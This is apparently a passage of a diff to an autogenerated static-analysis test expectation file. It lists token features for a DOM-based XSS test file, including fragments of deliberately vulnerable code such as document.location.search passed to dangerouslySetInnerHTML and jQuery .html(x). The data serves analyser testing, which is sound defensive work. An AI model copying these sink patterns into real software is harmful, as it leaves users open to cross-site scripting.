autogenerated/Xss/DomBasedXss/tst.js:71:7:71:7 | x | enclosingFunctionBody | x x $ myId html x | +| autogenerated/Xss/DomBasedXss/tst.js:71:7:71:7 | x | enclosingFunctionBody | x x $ myId html x | +| autogenerated/Xss/DomBasedXss/tst.js:71:7:71:7 | x | enclosingFunctionName | forEach#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:71:7:71:7 | x | enclosingFunctionName | forEach#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:71:7:71:7 | x | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:71:7:71:7 | x | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:73:5:73:5 | $ | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:73:5:73:5 | $ | contextSurroundingFunctionParameters | (x) | +| autogenerated/Xss/DomBasedXss/tst.js:73:5:73:5 | $ | enclosingFunctionBody | x x $ myId html x | +| autogenerated/Xss/DomBasedXss/tst.js:73:5:73:5 | $ | enclosingFunctionName | forEach#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:73:5:73:5 | $ | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:73:5:73:13 | $('myId') | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:73:5:73:13 | $('myId') | contextSurroundingFunctionParameters | (x) | +| autogenerated/Xss/DomBasedXss/tst.js:73:5:73:13 | $('myId') | enclosingFunctionBody | x x $ myId html x | +| autogenerated/Xss/DomBasedXss/tst.js:73:5:73:13 | $('myId') | enclosingFunctionName | forEach#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:73:5:73:13 | $('myId') | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:73:5:73:13 | exceptional return of $('myId') | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:73:5:73:13 | exceptional return of $('myId') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:73:5:73:13 | exceptional return of $('myId') | enclosingFunctionBody | x x $ myId html x | +| autogenerated/Xss/DomBasedXss/tst.js:73:5:73:13 | exceptional return of $('myId') | enclosingFunctionName | forEach#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:73:5:73:13 | exceptional return of $('myId') | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:73:5:73:18 | $('myId').html | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:73:5:73:18 | $('myId').html | contextSurroundingFunctionParameters | (x) | +| autogenerated/Xss/DomBasedXss/tst.js:73:5:73:18 | $('myId').html | enclosingFunctionBody | x x $ myId html x | +| autogenerated/Xss/DomBasedXss/tst.js:73:5:73:18 | $('myId').html | enclosingFunctionName | forEach#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:73:5:73:18 | $('myId').html | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:73:5:73:21 | $('myId').html(x) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:73:5:73:21 | $('myId').html(x) | contextSurroundingFunctionParameters | (x) | +| autogenerated/Xss/DomBasedXss/tst.js:73:5:73:21 | $('myId').html(x) | enclosingFunctionBody | x x $ myId html x | +| autogenerated/Xss/DomBasedXss/tst.js:73:5:73:21 | $('myId').html(x) | enclosingFunctionName | forEach#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:73:5:73:21 | $('myId').html(x) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:73:5:73:21 | exceptional return of $('myId').html(x) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:73:5:73:21 | exceptional return of $('myId').html(x) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:73:5:73:21 | exceptional return of $('myId').html(x) | enclosingFunctionBody | x x $ myId html x | +| autogenerated/Xss/DomBasedXss/tst.js:73:5:73:21 | exceptional return of $('myId').html(x) | enclosingFunctionName | forEach#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:73:5:73:21 | exceptional return of $('myId').html(x) | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:73:7:73:12 | 'myId' | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/DomBasedXss/tst.js:73:7:73:12 | 'myId' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:73:7:73:12 | 'myId' | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -16222,6 +113273,11 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:73:7:73:12 | 'myId' | enclosingFunctionBody | x x $ myId html x | | autogenerated/Xss/DomBasedXss/tst.js:73:7:73:12 | 'myId' | enclosingFunctionName | forEach#functionalargument | | autogenerated/Xss/DomBasedXss/tst.js:73:7:73:12 | 'myId' | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:73:15:73:18 | html | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:73:15:73:18 | html | contextSurroundingFunctionParameters | (x) | +| autogenerated/Xss/DomBasedXss/tst.js:73:15:73:18 | html | enclosingFunctionBody | x x $ myId html x | +| autogenerated/Xss/DomBasedXss/tst.js:73:15:73:18 | html | enclosingFunctionName | forEach#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:73:15:73:18 | html | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:73:20:73:20 | x | CalleeFlexibleAccessPath | $().html | | autogenerated/Xss/DomBasedXss/tst.js:73:20:73:20 | x | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:73:20:73:20 | x | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -16229,14 +113285,107 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:73:20:73:20 | x | enclosingFunctionBody | x x $ myId html x | | autogenerated/Xss/DomBasedXss/tst.js:73:20:73:20 | x | enclosingFunctionName | forEach#functionalargument | | autogenerated/Xss/DomBasedXss/tst.js:73:20:73:20 | x | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:77:5:77:5 | s | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:77:5:77:5 | s | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:77:5:77:5 | s | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:77:5:77:76 | s = | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:77:5:77:76 | s = | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:77:5:77:76 | s = | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:77:9:77:76 | | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:77:9:77:76 | | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:77:9:77:76 | | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:77:10:77:13 | span | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:77:10:77:13 | span | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:77:10:77:13 | span | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:77:15:77:37 | dangero ... nerHTML | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:77:15:77:37 | dangero ... nerHTML | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:77:15:77:37 | dangero ... nerHTML | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:77:15:77:74 | dangero ... earch}} | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:77:15:77:74 | dangero ... earch}} | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:77:15:77:74 | dangero ... earch}} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:77:15:77:74 | dangero ... earch}} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:77:15:77:74 | dangero ... earch}} | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:77:15:77:74 | dangero ... earch}} | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:77:40:77:73 | {__html ... search} | assignedToPropName | dangerouslySetInnerHTML | | autogenerated/Xss/DomBasedXss/tst.js:77:40:77:73 | {__html ... search} | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | | autogenerated/Xss/DomBasedXss/tst.js:77:40:77:73 | {__html ... search} | contextSurroundingFunctionParameters | | | autogenerated/Xss/DomBasedXss/tst.js:77:40:77:73 | {__html ... search} | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:77:41:77:46 | __html | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:77:41:77:46 | __html | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:77:41:77:46 | __html | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:77:41:77:72 | __html: ... .search | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:77:41:77:72 | __html: ... .search | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:77:41:77:72 | __html: ... .search | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:77:41:77:72 | __html: ... .search | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:77:41:77:72 | __html: ... .search | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:77:41:77:72 | __html: ... .search | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:77:49:77:56 | document | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:77:49:77:56 | document | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:77:49:77:56 | document | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:77:49:77:65 | document.location | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:77:49:77:65 | document.location | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:77:49:77:65 | document.location | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:77:49:77:72 | documen ... .search | assignedToPropName | __html | | autogenerated/Xss/DomBasedXss/tst.js:77:49:77:72 | documen ... .search | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | | autogenerated/Xss/DomBasedXss/tst.js:77:49:77:72 | documen ... .search | contextSurroundingFunctionParameters | | | autogenerated/Xss/DomBasedXss/tst.js:77:49:77:72 | documen ... .search | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:77:58:77:65 | location | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:77:58:77:65 | location | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:77:58:77:65 | location | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:77:67:77:72 | search | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:77:67:77:72 | search | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:77:67:77:72 | search | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:79:1:79:7 | angular | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:79:1:79:7 | angular | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:79:1:79:7 | angular | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:79:1:79:14 | angular.module | 